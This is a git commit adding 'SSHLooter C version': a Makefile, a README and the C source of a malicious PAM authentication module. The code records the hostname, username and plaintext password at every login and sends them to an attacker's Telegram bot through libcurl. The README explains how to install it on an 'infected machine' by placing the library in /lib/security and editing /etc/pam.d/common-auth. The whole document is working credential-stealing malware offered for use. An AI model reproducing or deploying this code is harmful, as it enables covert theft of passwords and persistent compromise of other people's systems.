first commit

Makefile

@@ -0,0 +1,5 @@
+CFLAGS += -Werror -Wall
+
+looter.so: looter.c
+	gcc $(CFLAGS) -fPIC -shared -Xlinker -x -o $@ $< -lcurl
+

README.md

@@ -0,0 +1,23 @@
+# SSHLooter C version
+It's the C version of [sshLooter](https://github.com/mthbernardes/sshLooter), which was written in python and have a lot of dependencies to be installed on the infected machine.
+Now with this C version, you compile it on your machine and send it to the infected machine without installing any dependencies.
+
+# Dependencies
+* gcc
+* libcurl4-openssl-dev
+* libpam0g-dev
+
+# Configure
+Edit the `looter.c` and add your telegram bot token and your user id.
+
+# Compiling
+```bash
+make
+```
+
+# Usage
+Copy the `looter.so` to the infected machine on `/lib/security`, then edit the `/etc/pam.d/common-auth` and add the following lines.
+```
+auth optional module.so
+account optional module.so
+```

looter.c

@@ -0,0 +1,64 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <curl/curl.h>
+#include <string.h>
+#include <security/pam_appl.h>
+#include <security/pam_modules.h>
+#include <unistd.h>
+
+size_t write_data(void *buffer, size_t size, size_t nmemb, void *userp)
+{
+  return size * nmemb;
+}
+
+void sendMessage(char (*message)[]) {
+  char url[500];
+  char data[200];
+
+  //INSERT HERE YOUR BOT KEY
+  char token[200] = "BOT TOKEN";
+
+  //INSERT HERE YOUR USER ID
+  int user_id = 1111111;
+
+  sprintf(url,"https://api.telegram.org/bot%s/sendMessage",token);
+  sprintf(data,"chat_id=%d&text=%s",user_id,*message);
+  CURL *curl;
+  curl_global_init(CURL_GLOBAL_ALL);
+  curl = curl_easy_init();
+  if(curl) {
+    curl_easy_setopt(curl, CURLOPT_URL, url);
+    curl_easy_setopt(curl, CURLOPT_POSTFIELDS,data); 
+    curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_data);
+    curl_easy_perform(curl);
+  }                                       
+  curl_global_cleanup();
+}
+
+PAM_EXTERN int pam_sm_setcred( pam_handle_t *pamh, int flags, int argc, const char **argv ) {
+  return PAM_SUCCESS;
+}
+
+PAM_EXTERN int pam_sm_acct_mgmt(pam_handle_t *pamh, int flags, int argc, const char **argv) {
+  return PAM_SUCCESS;
+}
+
+PAM_EXTERN int pam_sm_authenticate( pam_handle_t *pamh, int flags,int argc, const char **argv ) {
+  int retval;
+  const char* username;
+  const char* password;
+  char message[1024];
+  char hostname[128];
+  retval = pam_get_user(pamh, &username, "Username: ");
+  pam_get_item(pamh, PAM_AUTHTOK, (void *) &password);
+  if (retval != PAM_SUCCESS) {
+    return retval;
+  }
+  gethostname(hostname, sizeof hostname);
+  sprintf(message,"Hostname: %s\nUsername %s\nPassword: %s\n",hostname,username,password);
+  sendMessage(&message);
+  return PAM_SUCCESS;
+}
+
+
+